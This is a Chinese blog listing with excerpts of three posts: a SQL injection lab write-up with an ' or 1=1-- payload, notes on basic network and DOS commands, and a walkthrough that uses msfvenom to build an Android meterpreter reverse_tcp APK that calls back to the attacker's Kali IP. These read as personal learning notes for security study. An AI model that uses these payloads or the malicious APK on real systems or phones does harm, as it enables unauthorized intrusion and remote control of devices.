- 博客(3)
- 收藏
- 关注
RSS订阅原创 SQL注入
1.该实验室在产品类别过滤器中包含一个SQL注入漏洞。当用户选择类别时,应用程序将执行如下SQL查询:SELECT * FROM products WHERE category = ‘Gifts’ AND released = 1要解决此问题,请执行SQL注入攻击,使应用程序显示任何类别的所有产品的详细信息,包括已发布和未发布。解题:点进类别,把后缀改为category=‘ or 1=1--(--代表注释后面内容)2.该实验在登录功能中包含一个SQL注入漏洞。要解决此问题,请执行SQL注入攻击,以ad
2021-02-05 16:12:11
99
原创 2021-01-31
IP地址详解ipconfig #查看IP地址基本信息ipconfig #查看IP地址详细信息ping + 目标IP地址 #测试网络联通性ping -t + 目标IP地址 #一直pingping -n 数字 + 目标IP地址 #ping包的数量nslookup www.**.com #手工解析域名的ip地址基本dos命令命令行操作d: #切换到d盘目录echo #创建文件copy on 文件名.扩展名 #开始编辑内容,ctrl+z回车结束编写dir #列出目录下文件
2021-02-03 15:47:33
112
原创 简单记录自己利用meterpreter入侵安卓机
简单记录自己利用meterpreter入侵安卓机需要准备一台安卓机安装kali Linux系统入侵流程kali终端执行 msfvenom -p android/meterpreter/reverse_tcp lhost=(kali linux的IP地址) lport=5555 R>/root/a.apk可以看到在root目录下生成了a.apk文件将apk文件发送到安卓手机(方式自行选择,此处可扩展)手机安装apk,为了测试成功,还需根据测试目的授予相应权限kali
2021-01-16 23:13:09
1366
2
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人